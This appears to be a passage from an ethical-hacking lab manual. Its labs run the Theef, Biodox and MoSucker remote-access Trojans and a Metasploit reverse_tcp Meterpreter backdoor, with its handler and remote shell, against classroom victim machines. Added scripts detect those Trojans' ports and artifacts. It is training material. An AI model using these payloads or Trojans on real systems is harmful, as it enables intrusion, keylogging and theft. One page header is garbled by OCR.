A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks
TASK 1

Create Server with Pro Rat

1. Launch Windows Server 2008 Virtual Machine and navigate to Z:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.
2. Double-click Server210.exe to run the Trojan on the victim's machine.
FIGURE 8.1: Windows Server 2008 - Theef Folder

3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.


[Open File - Security Warning dialog for Server210.exe: "The publisher could not be verified. Are you sure you want to run this software?"]

FIGURE 8.2: Windows Server 2008 - Security Warning

4. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.
5. Double-click Client210.exe to access the victim machine remotely.

FIGURE 8.3: Windows 8 - Running Client210.exe

6. In the Open File - Security Warning window, click Run, as shown in the following screenshot.


[Open File - Security Warning dialog for Client210.exe: "The publisher could not be verified. Are you sure you want to run this software?"]

FIGURE 8.4: Windows 8 - Security Warning

7. The main window of Theef appears, as shown in the following screenshot.
[Theef main screen: IP field, Port 6703, FTP 2968, Connect and Disconnect buttons]

FIGURE 8.5: Theef Main Screen

Theef version 2.10, 01/November/2004

8. Enter an IP address in the IP field, and leave the Port and FTP fields at their defaults. In this lab we are attacking Windows Server 2008 (10.0.0.13).
9. Click Connect after entering the IP address of Windows Server 2008.


FIGURE 8.6: Theef Connecting to Victim Machine

10. Now, in Windows 8, you have remote access to the Windows Server 2008 machine.
Connection log shown in the Theef window after connecting to 10.0.0.13:
[15:05:31] Attempting connection with 10.0.0.13
[15:05:31] Connection established with 10.0.0.13
[15:05:31] Connection accepted
[15:05:31] Connected to transfer port
Connected to server

FIGURE 8.7: Theef Gained Access to Victim Machine

11. To view the computer information, click the Computer icon at the bottom of the window.
12. In Computer Information, you are able to view PC Details, OS Info, Home, and Network by clicking the respective buttons.


FIGURE 8.8: Theef Computer Information

13. Click the Spy icon to capture screens, log keystrokes, etc. on the victim's machine.
[Theef Computer Information panel, with buttons PC Details, OS Info, Home and Network]

FIGURE 8.9: Theef Spy

14. Select Keylogger to record the keystrokes of the victim.
15. In the Keylogger window, click the Play button to record the keystrokes.


[Keylogger window, title "Keylogger [Started]"]

FIGURE 8.9: Theef Keylogger Window

16. Now go to Windows Server 2008 and type some text in Notepad so that the keystrokes are recorded.
FIGURE 8.10: Theef Recorded Keystrokes

17. Similarly, you can access the other details of the victim's machine by clicking the respective icons.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility    Information Collected/Objectives Achieved
Theef           Output:
                - Victim's machine PC information
                - Victim's machine keystrokes

Questions
1. Is there any way to filter out the "localhost:####" remote address entries?
2. Evaluate the other details displayed by "autoruns" and analyze the working of the autoruns tool.
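Added example, not part of the lab manual, that serves question 1 here and question 2 of the preceding lab: defender-side triage of a netstat -ano style listing that hides the loopback "localhost:####" rows TCPView clutters the view with, then flags sockets on the Theef default ports used in this lab (6703 control, 2968 FTP). The listing, addresses and PIDs are constructed.

```python
"""Added example, not part of the lab manual. Triage of a Windows "netstat -ano"
style listing: drop loopback rows, then flag sockets on the Theef default ports
seen in the lab. The sample output, addresses and PIDs are constructed."""
import ipaddress

# Default ports of the Theef 2.10 client/server shown in the lab screenshots.
THEEF_DEFAULT_PORTS = {6703: "Theef control port", 2968: "Theef FTP port"}

# Constructed listing; 10.0.0.13 is the lab's victim, the rest is made up.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:2968           0.0.0.0:0              LISTENING       1472
  TCP    0.0.0.0:6703           0.0.0.0:0              LISTENING       1472
  TCP    10.0.0.13:6703         10.0.0.10:50012        ESTABLISHED     1472
  TCP    10.0.0.13:49210        203.0.113.5:443        ESTABLISHED     2220
  TCP    127.0.0.1:49152        127.0.0.1:49153        ESTABLISHED     812
  TCP    127.0.0.1:49153        127.0.0.1:49152        ESTABLISHED     812
  TCP    [::1]:49160            [::1]:49161            ESTABLISHED     812
  TCP    [::]:135               [::]:0                 LISTENING       700
"""


def split_endpoint(endpoint):
    """Split "host:port" into (host, port); handles bracketed IPv6 like [::1]:80."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def parse_netstat(text):
    """Turn TCP rows of netstat -ano output into dicts; the header and UDP rows
    (which have no State column) are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP":
            continue
        lhost, lport = split_endpoint(fields[1])
        rhost, rport = split_endpoint(fields[2])
        rows.append({"proto": fields[0], "lhost": lhost, "lport": lport,
                     "rhost": rhost, "rport": rport,
                     "state": fields[3], "pid": int(fields[4])})
    return rows


def is_loopback(host):
    """True for 127.0.0.0/8 and ::1, the addresses TCPView shows as "localhost"."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:          # e.g. "*" or a hostname
        return False


def hide_loopback(rows):
    """Answer to the TCPView question: drop rows whose remote side is localhost."""
    return [r for r in rows if not is_loopback(r["rhost"])]


def flag_watch_ports(rows, watch_ports=THEEF_DEFAULT_PORTS):
    """Return (row, reason) for every listener or connection on a watched port."""
    hits = []
    for r in rows:
        for port in (r["lport"], r["rport"]):
            if port in watch_ports:
                hits.append((r, watch_ports[port]))
                break
    return hits


def pids_to_investigate(rows, watch_ports=THEEF_DEFAULT_PORTS):
    """PIDs owning any flagged socket, to look up with tasklist or Process Explorer."""
    return sorted({r["pid"] for r, _ in flag_watch_ports(rows, watch_ports)})


if __name__ == "__main__":
    rows = hide_loopback(parse_netstat(SAMPLE_NETSTAT))
    for r, why in flag_watch_ports(rows):
        print(f"PID {r['pid']:>5}  {r['lhost']}:{r['lport']} -> "
              f"{r['rhost']}:{r['rport']}  {r['state']:<11} {why}")
    print("investigate PIDs:", pids_to_investigate(rows))
```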

Internet Connection Required: ☐ Yes ☑ No

Platform Supported: ☑ Classroom ☑ iLabs


Creating a Server Using the Biodox
Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.

Lab Scenario
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.


Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment
To carry this out, you need:
■ Biodox tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan

■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools


Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks
TASK 1: Create Server with Pro Rat
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
2. Double-click BIODOX OE Edition.exe to run the Trojan on the victim's machine.
FIGURE 9.1: Windows 8-Biodox Contents

3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.
FIGURE 9.2: Windows 8-Security Warning


4. Select your preferred language from the drop-down list in the Biodox main window; in this lab we have selected English.
FIGURE 9.3: Windows 8-Biodox main window language selection

5. Now click the Server Editor button to build a server as shown in the following screenshot.
FIGURE 9.4: Windows 8-Security Warning

6. In Server Editor options, enter a victim's IP address in the IP/DNS field; in this lab we are using Windows Server 2008 (10.0.0.13).

7. Leave the rest of the settings at their defaults; to build a server click the Create Server button.
Note: IP addresses may differ in your classroom labs.
FIGURE 9.5: Biodox Main Screen

8. Server.exe file will be created in its default directory: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
FIGURE 9.5: Biodox services

9. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan to run the server.exe file.


FIGURE 9.6: Biodox server.exe

10. Double-click server.exe in Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.
FIGURE 9.7: Run the tool

11. Now switch to Windows 8 Virtual Machine and click the active/deactive status button to see the connected machines.


FIGURE 9.8: Biodox open source editor

12. After getting connected you can view connected victims as shown in the following screenshot.
FIGURE 9.9: Biodox open source editor

13. Now you can perform actions with the victim by selecting the appropriate action tab in the left pane of the Biodox window.
14. Now click the settings manager option to view the applications running and other application settings.

FIGURE 9.9: Biodox open source editor

15. You can also record the screenshots of the victim by clicking the Screen Capture button.
16. Click the Start Screen Capture button to capture screenshots of the victim's machine.

FIGURE 9.10: screen capture

17. Biodox displays the captured screenshot of the victim’s machine.


FIGURE 9.11: screen capture

18. Similarly, you can access the details of the victim's machine by clicking the respective functions.
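Two of the settings left at their defaults above are detectable artifacts: the four Biodox ports (connection 6661, transfer 6662, screen capture 6663, webcam 6664) and the registry entry mssrs32 / mssrs32.exe that the server uses for persistence. The following Python script is an added detection example, not part of the lab manual or the Biodox tool: it scans constructed netstat -ano lines and constructed Run-key values for those indicators; the addresses, PIDs and benign entries in the sample are made up.

```python
import re
from dataclasses import dataclass

# Indicators read off the Biodox server editor in the lab: the four default
# ports (connection 6661, transfer 6662, screen capture 6663, webcam 6664)
# and the registry value name / binary name used for persistence.
BIODOX_PORTS = {6661, 6662, 6663, 6664}
BIODOX_PERSIST_NAMES = {"mssrs32", "mssrs32.exe"}

# Matches one TCP row of "netstat -ano" output (Windows column layout).
NETSTAT_RE = re.compile(
    r"^\s*TCP\s+(?P<laddr>\S+):(?P<lport>\d+)\s+(?P<raddr>\S+):(?P<rport>\d+)"
    r"\s+(?P<state>\S+)\s+(?P<pid>\d+)\s*$"
)


@dataclass(frozen=True)
class Finding:
    source: str   # "netstat" or "run_key"
    pid: int      # 0 when no process id is known
    detail: str


def scan_netstat(lines):
    """Flag TCP connections whose local or remote port is a Biodox default."""
    findings = []
    for line in lines:
        m = NETSTAT_RE.match(line)
        if not m:
            continue  # header row or non-TCP row
        lport, rport = int(m["lport"]), int(m["rport"])
        if lport in BIODOX_PORTS or rport in BIODOX_PORTS:
            findings.append(Finding(
                "netstat", int(m["pid"]),
                f"{m['laddr']}:{lport} -> {m['raddr']}:{rport} {m['state']}"))
    return findings


def scan_run_keys(entries):
    """entries: (value name, value data) pairs from an HKLM/HKCU ...\\Run key.
    Flag entries whose name or launched binary is the Biodox persistence name."""
    findings = []
    for name, data in entries:
        binary = data.strip('"').replace("/", "\\").rsplit("\\", 1)[-1]
        if name.lower() in BIODOX_PERSIST_NAMES or binary.lower() in BIODOX_PERSIST_NAMES:
            findings.append(Finding("run_key", 0, f"{name} = {data}"))
    return findings


# Constructed sample input: a netstat -ano excerpt from the victim VM
# (10.0.0.13 in the lab) and two Run-key values. Addresses, PIDs and the
# benign "Updater" entry are made up for this example.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.13:49158        10.0.0.12:6661         ESTABLISHED     1836
  TCP    10.0.0.13:49159        10.0.0.12:6663         ESTABLISHED     1836
  TCP    10.0.0.13:49160        10.0.0.5:443           ESTABLISHED     2044
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
"""
SAMPLE_RUN_KEYS = [
    ("Updater", r"C:\Program Files\Example\updater.exe"),
    ("mssrs32", r"C:\Windows\System32\mssrs32.exe"),
]


def run_scan():
    """Return all findings; a PID shared by several hits ties them to one process."""
    return scan_netstat(SAMPLE_NETSTAT.splitlines()) + scan_run_keys(SAMPLE_RUN_KEYS)


if __name__ == "__main__":
    for f in run_scan():
        print(f"[{f.source}] pid={f.pid} {f.detail}")
```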

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Biodox
Information Collected/Objectives Achieved: Output: Record the screenshots of the victim machine
Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs


Creating a Server Using the MoSucker
MoSucker is a Visual Basic Trojan. MoSucker's edit server program has a client with the same layout as SubSeven's client.

Lab Scenario
A backdoor is a secret or unauthorized channel for accessing a computer system. In an attack scenario, hackers install backdoors on a machine, once compromised, to access it in an easier manner at later times. With the growing use of e-commerce, web applications have become the target of choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways backdoors can be installed and to take required preventive steps. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.


Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry this out, you need:
■ MoSucker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks
TASK 1: Create Server with ProRat
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.
2. Double-click the CreateServer.exe file to create a server.
FIGURE 10.1: Install createServer.exe

3. In the Open File - Security Warning dialog box, click Run.


FIGURE 10.2: Install createServer.exe

4. The MoSucker Server Creator/Editor window appears; leave the default settings and click OK.
FIGURE 10.3: Install createServer.exe

5. Use the file name server.exe and, to save it in the same directory, click Save.


FIGURE 10.4: Save Server.exe

6. MoSucker will generate a server with the complete settings in the default directory.
FIGURE 10.5: Install server progress

7. Click OK in the Edit Server pop-up message.
FIGURE 10.6: Server created successfully

8. In the MoSucker wizard, change the Victim's Name to Victim or leave all the settings at their defaults.


FIGURE 10.7: Give the victim machine details

9. Now click Keylogger in the left pane, check the Enable off-line keylogger option, and then click Save.
10. Leave the rest of the settings at their defaults.
FIGURE 10.8: Enable the keylogger

11. Click OK in the EditServer pop-up message.
FIGURE 10.9: Server save file


12. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to run the server.exe file.
FIGURE 10.10: click server.exe

13. Double-click server.exe in Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.
FIGURE 10.11: Click on Run

14. Now switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to launch MoSucker.exe.
15. Double-click MoSucker.exe.


FIGURE 10.12: click on MoSucker.exe

16. In the Open File - Security Warning dialog box, click Run to launch MoSucker.
FIGURE 10.13: Run the application

17. The MoSucker main window appears, as shown in the following figure.
FIGURE 10.14: MoSucker main window


18. Enter the IP address of the victim and the port number as you noted at the time of server configuration, and then click Connect.
19. In this lab, we have noted Windows Server 2008 virtual machine's IP address (10.0.0.13) and port number: 4288.
Note: These might differ in your classroom labs.

FIGURE 10.15: connect to victim machine

20. Now the Connect button automatically turns to Disconnect after getting connected with the victim machine as shown in the following screenshot.

FIGURE 10.16: connection established

21. Now click Misc stuff in the left pane, which shows different options that an attacker can use to perform actions from his or her system.


FIGURE 10.17: setting server options

22. You can also access the victim's machine remotely by clicking Live capture in the left pane.
23. In the Live capture option click Start, which will open the remote desktop of a victim's machine.
FIGURE 10.18: start capturing

24. The remote desktop connection of the victim's machine is shown in the following figure.


FIGURE 10.19: capturing victim machine

25. You can access files, modify the files, and so on in this mode.
FIGURE 10.20: capturing victim machine

26. Similarly, you can access the details of the victim's machine by clicking the respective functions.
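The MoSucker server editor above offers the decoy server names kernel32, msconfig, winexec32 and netconfig with extensions such as exe, pif, bat and com, so the dropped server masquerades as a Windows component. The following Python script is an added detection example, not part of the lab manual or MoSucker: it checks a constructed file listing for those names appearing with a decoy extension, or outside the directory where the genuine file lives; the paths and user name in the sample are made up, and the genuine-location table is an assumption that covers only msconfig.exe.

```python
# Decoy names and extensions offered by the MoSucker server editor in the lab
# (Server Name(s) and Extension(s) fields, left at their defaults).
MOSUCKER_NAMES = {"kernel32", "msconfig", "winexec32", "netconfig"}
MOSUCKER_EXTS = {".exe", ".pif", ".bat", ".com"}

# Where the genuine Windows file with a decoy name actually lives (lower-case).
# Assumption for this example: only msconfig.exe is a real binary with one of
# these names; kernel32 is a DLL, and winexec32/netconfig are not Windows files.
GENUINE_LOCATIONS = {"msconfig.exe": r"c:\windows\system32"}


def split_windows_path(path):
    """Split a Windows path into (directory, filename) without os.path,
    so the check also runs on a non-Windows analysis host."""
    normalized = path.replace("/", "\\")
    directory, _, filename = normalized.rpartition("\\")
    return directory, filename


def classify(path):
    """Return a reason string if the file looks like a MoSucker decoy, else None."""
    directory, filename = split_windows_path(path)
    base, dot, ext = filename.lower().rpartition(".")
    if not dot:
        return None                # no extension at all
    ext = "." + ext
    if base not in MOSUCKER_NAMES or ext not in MOSUCKER_EXTS:
        return None                # e.g. the genuine kernel32.dll is not flagged
    expected_dir = GENUINE_LOCATIONS.get(base + ext)
    if expected_dir is None:
        return f"{filename}: no genuine Windows file has this name"
    if directory.lower().rstrip("\\") != expected_dir:
        return f"{filename}: expected in {expected_dir}, found in {directory}"
    return None


def scan_listing(paths):
    """Return [(path, reason)] for every suspicious entry in a file listing."""
    hits = []
    for path in paths:
        reason = classify(path)
        if reason:
            hits.append((path, reason))
    return hits


# Constructed sample listing (user name and locations are made up).
SAMPLE_FILES = [
    r"C:\Windows\System32\kernel32.dll",               # genuine library
    r"C:\Windows\System32\msconfig.exe",               # genuine tool
    r"C:\Windows\System32\kernel32.exe",               # decoy: kernel32 is never an .exe
    r"C:\Users\victim\AppData\Roaming\msconfig.pif",   # decoy: decoy extension
    r"C:\Users\victim\AppData\Roaming\msconfig.exe",   # decoy: wrong directory
    r"C:\Windows\notepad.exe",                         # unrelated
]


if __name__ == "__main__":
    for path, reason in scan_listing(SAMPLE_FILES):
        print(f"SUSPICIOUS {path}\n    {reason}")
```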

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: MoSucker
Information Collected/Objectives Achieved: Output: Record the screenshots of the victim's machine

Questions
1. Evaluate and examine various methods to connect to victims if they are in different cities or countries.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs


Hack Windows 7 Using Metasploit
Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Lab Scenario
Large companies are common targets for hackers and attackers of various kinds, and it is not uncommon for these companies to be actively monitoring traffic to and from their critical IT infrastructure. Based on the functionality of the Trojan we can safely surmise that the intent of the Trojan is to open a backdoor on a compromised computer, allowing a remote attacker to monitor activity and steal information from the compromised computer. Once installed inside a corporate network, the backdoor feature of the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, meaning that the wealth of information that may be stolen could potentially be far greater than that existing on a single machine. A basic principle with all malicious programs is that they need user support to do the damage to a computer. That is the reason why Trojan horses try to deceive users by showing them some other form of email. Backdoor programs are used to gain unauthorized access to systems, and backdoor software is used by hackers to gain access to systems so that they can send in the malicious software to that particular system. Successful attacks by the hacker or attacker infecting the target environment with a customized Trojan horse (backdoor) determine exploitable holes in the current security system. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.


Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Attacking a network using a sample backdoor and monitoring the system activity

Lab Environment
To carry this out, you need:
■ A computer running Windows Server 2012
■ BackTrack 5 r3 running in Virtual machine
■ Windows 7 running in virtual machine (Victim machine)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Tasks
TASK 1: Create Server Connection
1. Start BackTrack 5 virtual machine.
2. Open the terminal console by navigating to Applications → BackTrack → Exploitation Tools → Network Exploitation Tools → Metasploit Framework → msfconsole.
Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tool.

C E H L ab M an u al P age 518

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council AH Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

FIGURE 11.1: Selecting msfconsole from metasploit Framework

3. Type the following command in msfconsole: msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe and press Enter. The X option tells msfpayload to emit a Windows executable; the redirection target must be the file path Desktop/Backdoor.exe, because redirecting to Desktop alone fails with "sh: Desktop: is a directory".
Note: 10.0.0.6 is the IP address of the BackTrack machine. IP addresses may vary in your lab environment.
FIGURE 11.2: Creating Backdoor.exe

Metasploit Framework: a tool for developing and executing exploit code against a remote target machine.

4. This command creates a Windows executable file named Backdoor.exe and saves it on the BackTrack 5 desktop.

FIGURE 11.3: Created Backdoor.exe file


5. Now you need to share Backdoor.exe with your victim machine (Windows 7), by following these steps:

6. Open a new BackTrack 5 terminal (CTRL+ALT+T), run the command mkdir /var/www/share and press Enter to create a new directory named share.

To create the new directory share, the following command is used: mkdir /var/www/share

FIGURE 11.4: Creating the share directory

7. Change the mode of the share folder to 755 by entering the command chmod -R 755 /var/www/share/ and pressing Enter.
To change the mode of the share folder, use the following command: chmod -R 755 /var/www/share/

FIGURE 11.5: Setting the share folder mode to 755

8. Change the ownership of that folder to www-data by entering the command chown -R www-data:www-data /var/www/share/ and pressing Enter.

To change the ownership of the folder to www-data, use this command: chown -R www-data:www-data /var/www/share/

FIGURE 11.6: Changing the ownership of the folder

9. Type the command ls -la /var/www/ | grep share and press Enter. The output should show the share directory with mode drwxr-xr-x and owner www-data.
FIGURE 11.7: Verifying the share directory

10. The next step is to start the Apache server by typing the command service apache2 start in the terminal and pressing Enter. If Apache is already running, the command simply reports that httpd is already running; that is fine.

FIGURE 11.8: Starting the Apache web server

Files generated by Metasploit exploit modules are saved under /root/.msf4/data/exploits/; to serve them from the Apache web server, copy them into the share with: cp /root/.msf4/data/exploits/* /var/www/share/

11. Now that your Apache web server is running, copy the Backdoor.exe file into the share folder. Type the command cp /root/Desktop/Backdoor.exe /var/www/share/ and press Enter.

FIGURE 11.9: Copying Backdoor.exe into the share folder

12. Now go to the Windows 7 virtual machine, open Firefox or any other web browser, type the URL http://10.0.0.6/share/ in the URL field and press Enter.
Note: Here 10.0.0.6 is the IP address of BackTrack; it may vary in your lab environment.

FIGURE 11.10: Firefox showing the Apache directory listing of /share/ with Backdoor.exe

13. Download the Backdoor.exe file in the Windows 7 virtual machine and save it on the desktop.

If you do not have apache2 installed on BackTrack, run apt-get install apache2.

FIGURE 11.11: Backdoor.exe saved on the desktop

14. Switch back to the BackTrack machine.

15. Open the Metasploit console. To create a handler that will receive the connection from the victim machine (Windows 7), type the command use exploit/multi/handler and press Enter.

Files generated by Metasploit exploit modules are saved in the /root/.msf4/data/exploits/ folder.

FIGURE 11.12: Selecting exploit/multi/handler to exploit the victim machine

16. To use the reverse TCP Meterpreter payload (the same payload Backdoor.exe was built with), type the command set payload windows/meterpreter/reverse_tcp and press Enter.
To set the reverse TCP payload, use the following command: set payload windows/meterpreter/reverse_tcp

FIGURE 11.13: Setting up the reverse TCP payload

17. To set the local IP address that will catch the reverse connection, type the command set lhost 10.0.0.6 (the BackTrack IP address) and press Enter. The value must match the LHOST that was compiled into Backdoor.exe in step 3, otherwise the backdoor will connect to the wrong address.

FIGURE 11.14: Setting the local IP address (lhost)

18. To start the handler, type the command exploit -j -z and press Enter. The -j option runs the handler as a background job and -z tells Metasploit not to interact with the session automatically once it opens. The handler listens on port 4444, the default LPORT, which is also the port Backdoor.exe was built to connect back to.
FIGURE 11.15: Starting the handler for the Windows 7 machine

19. Now switch to the victim machine (Windows 7) and double-click the Backdoor.exe file (already downloaded) to run it.

20. Switch back to the BackTrack machine. The handler reports that it is sending the Meterpreter stage to the victim and that a Meterpreter session has opened (in the figure, 10.0.0.6:4444 -> 10.0.0.5:49458), as shown in the following figure.

To interact with the available session, you can use sessions -i <session id>

FIGURE 11.16: Exploit result: Meterpreter session opened from the Windows 7 machine

21. To interact with the available session, type the command sessions -i 1 and press Enter. If Metasploit replies "Invalid session id" (for example because an earlier session was opened and then closed), list the current sessions with sessions -l and use the id shown there.

FIGURE 11.17: Interacting with the session

22. Enter the command shell and press Enter. Meterpreter creates a cmd.exe process on the victim and attaches it to a channel, so you get a Windows command prompt.

FIGURE 11.18: Typing the shell command

23. Type the dir command and press Enter. It lists the contents of the current directory on the victim machine (Windows 7), in this case C:\Users\Admin\Desktop.
FIGURE 11.19: Listing the victim's desktop directory on the Windows 7 machine

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
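The handler output in step 20 shows exactly what a defender on the Windows 7 machine can hunt for: an outbound connection from 10.0.0.5:49458 to 10.0.0.6:4444 owned by the Backdoor.exe process. The following script is an added example, not part of the CEH manual: it parses netstat -ano and tasklist output captured from the victim and flags established connections to ports commonly used by Metasploit handlers, mapping each to its process. The two samples embedded below are constructed for the example (PIDs and the non-lab entries are invented), and the port list is a heuristic assumption, not a rule from the manual.

```shell
# Added example (not from the CEH lab manual): defender-side check for the
# reverse_tcp backdoor planted in this lab. Input is the text of
# "netstat -ano" and "tasklist" exported from the Windows victim.
set -eu

# Constructed sample of netstat -ano output; the second line matches the
# lab's session (10.0.0.5:49458 -> 10.0.0.6:4444). PIDs are invented.
NETSTAT_SAMPLE='  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       712
  TCP    10.0.0.5:49458         10.0.0.6:4444          ESTABLISHED     2540
  TCP    10.0.0.5:49460         93.184.216.34:443      ESTABLISHED     1180'

# Constructed sample of tasklist output for the same PIDs.
TASKLIST_SAMPLE='svchost.exe                    712 Services                   0      9,216 K
Backdoor.exe                  2540 Console                    1     12,480 K
firefox.exe                   1180 Console                    1    145,300 K'

# Heuristic list of ports often used by Metasploit handlers; 4444 is the
# default LPORT used in this lab. Assumption, tune it for your environment.
SUSPECT_PORTS="4444 4445 5555 8080"

# Read netstat -ano lines on stdin; print "pid remote" for every ESTABLISHED
# TCP connection whose remote port is in SUSPECT_PORTS (IPv4 only).
suspect_connections() {
    awk -v ports="$SUSPECT_PORTS" '
        BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) want[p[i]] = 1 }
        $1 == "TCP" && $4 == "ESTABLISHED" {
            split($3, r, ":")
            if (r[2] in want) print $5, $3
        }'
}

# Read tasklist lines on stdin; print the image name that owns PID $1.
pid_to_image() {
    awk -v pid="$1" '$2 == pid { print $1 }'
}

# Combine both: one ALERT line per suspicious connection, exit status 0 if
# anything was found and 1 if the host looks clean.
check_reverse_shells() {
    local netstat_text="$1" tasklist_text="$2" hits pid remote image
    hits=$(printf '%s\n' "$netstat_text" | suspect_connections)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits" | while read -r pid remote; do
        image=$(printf '%s\n' "$tasklist_text" | pid_to_image "$pid")
        printf 'ALERT pid=%s image=%s remote=%s\n' "$pid" "${image:-unknown}" "$remote"
    done
}

check_reverse_shells "$NETSTAT_SAMPLE" "$TASKLIST_SAMPLE"
```

On a real host the port heuristic only catches lazy defaults; a process that runs from a user's Desktop or Downloads folder and holds any outbound connection is the stronger signal, and the same parsing approach extends to that check by joining the PID against the process image path.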


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Metasploit
Information Collected/Objectives Achieved: Output: Hack the Windows 7 machine directories (list the victim's desktop directory through a Meterpreter shell)
Internet Connection Required: ☐ Yes  ☑ No
Platform Supported: ☑ Classroom  ☑ iLabs
